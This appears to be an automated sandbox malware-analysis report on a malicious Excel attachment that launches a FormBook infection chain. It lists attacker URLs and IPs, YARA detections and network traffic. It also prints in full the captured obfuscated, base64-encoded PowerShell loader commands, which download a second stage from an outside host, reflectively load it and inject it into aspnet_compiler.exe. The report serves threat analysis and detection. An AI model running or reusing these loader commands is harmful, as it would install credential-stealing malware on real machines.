              Source: global trafficHTTP traffic detected: GET /361/sen/seemebestgoodluckthings.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.12Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /361/sen/seemebestgoodluckthings.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=9228-Connection: Keep-AliveHost: 172.245.123.12If-Range: "26f35-6283fd0da12d9"
              Source: global trafficHTTP traffic detected: GET /361/seemebestthingsentirelifegivenbackwithgood.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.12Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /361/TELNERA.txt HTTP/1.1Host: 172.245.123.12Connection: Keep-Alive
              Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: linkjago.me
              Source: global trafficDNS traffic detected: DNS query: 1016.filemail.com
              Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.12/
              Source: powershell.exe, 00000008.00000002.506928711.00000000027A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.12/361/seemeb
              Source: powershell.exe, 00000008.00000002.506928711.00000000027A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.12/361/seemebestthingsentirelifegivenbackwithgood.tIF
              Source: powershell.exe, 00000008.00000002.512506171.000000001A7EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.12/361/seemebestthingsentirelifegivenbackwithgood.tIF89
              Source: powershell.exe, 00000008.00000002.506928711.00000000027A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.12/361/seemebestthingsentirelifegivenbackwithgood.tIFp
              Source: mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.12/361/sen/seemebestgoodluckthings.hta
              Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.12/361/sen/seemebestgoodluckthings.hta-
              Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.12/361/sen/seemebestgoodluckthings.hta6X1
              Source: mshta.exe, 00000004.00000002.489430363.000000000025A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.12/361/sen/seemebestgoodluckthings.htaC:
              Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.12/361/sen/seemebestgoodluckthings.htaE
              Source: mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.12/361/sen/seemebestgoodluckthings.htaM
              Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.12/361/sen/seemebestgoodluckthings.htaU
              Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.12/361/sen/seemebestgoodluckthings.htae
              Source: mshta.exe, 00000004.00000003.487975537.0000000003335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.12/361/sen/seemebestgoodluckthings.htahttp://172.245.123.12/361/sen/seemebestgood
              Source: mshta.exe, 00000004.00000002.489430363.000000000022E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486065504.000000000027F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489381108.000000000027E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489449708.000000000027F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.12/361/sen/seemebestgoodluckthings.htastantial&rub=quick&sideboard=divergent&pett
              Source: mshta.exe, 00000004.00000002.489574568.00000000037A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.12/361/sen/seemebestgoodluckthings.htatial&rub=quick&sideboa
              Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.12/361/sen/seemebestgoodluckthings.htau
              Source: mshta.exe, 00000004.00000002.489574568.00000000037D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.12/nt=5&recv=
              Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C068000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
              Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
              Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
              Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512506171.000000001A7A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
              Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
              Source: powershell.exe, 00000008.00000002.506928711.00000000027A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
              Source: powershell.exe, 00000008.00000002.511546715.00000000122B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
              Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
              Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
              Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C068000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
              Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
              Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
              Source: powershell.exe, 00000008.00000002.506928711.0000000002281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.550062163.00000000020D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
              Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
              Source: powershell.exe, 0000000D.00000002.550062163.00000000022D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1016.filemail.com
              Source: powershell.exe, 0000000D.00000002.550062163.00000000022D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5T
              Source: powershell.exe, 00000008.00000002.511546715.00000000122B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000008.00000002.511546715.00000000122B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000008.00000002.511546715.00000000122B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://linkjago.me/
              Source: mshta.exe, 00000004.00000002.489574568.00000000037A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://linkjago.me/c
              Source: mshta.exe, 00000004.00000002.489449708.000000000027F000.00000004.00000020.00020000.00000000.sdmp, PI-02911202409#.xla.xlsx, 50A30000.0.drString found in binary or memory: https://linkjago.me/fhq3w8?&pupil=gigantic&antechamber=substantial&rub=quick&sideboard=divergent&pet
              Source: powershell.exe, 00000008.00000002.511546715.00000000122B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: mshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.489358755.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487071109.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.489574568.00000000037DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C094000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.512809894.000000001C068000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
              Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
              Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
              Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
              Source: unknownHTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.22:49163 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.22:49165 version: TLS 1.2
              Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

              E-Banking Fraud

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 16.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000010.00000002.553925557.0000000000150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.554015274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 16.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 16.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000010.00000002.553925557.0000000000150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000010.00000002.554015274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 4024, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Excel sheet contains many unusual embedded objects
              Source: PI-02911202409#.xla.xlsxOLE: Microsoft Excel 2007+
              Source: PI-02911202409#.xla.xlsxOLE: Microsoft Excel 2007+
              Source: 50A30000.0.drOLE: Microsoft Excel 2007+
              Source: 50A30000.0.drOLE: Microsoft Excel 2007+
              Microsoft Office drops suspicious files
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestgoodluckthings[1].htaJump to behavior
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSgkbnVsbCwgQCgndHh0LkFSRU5MRVQvMTYzLzIxLjMyMS41NDIuMjcxLy86cHR0aCcsICckZGFkYW5lJywgJyRkYWRhbmUnLCAnJGRhZGFuZScsICdhc3BuZXRfY29tcGlsZXInLCAnJGRhZGFuZScsICckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCckZGFkYW5lJywnJGRhZGFuZScsJyRkYWR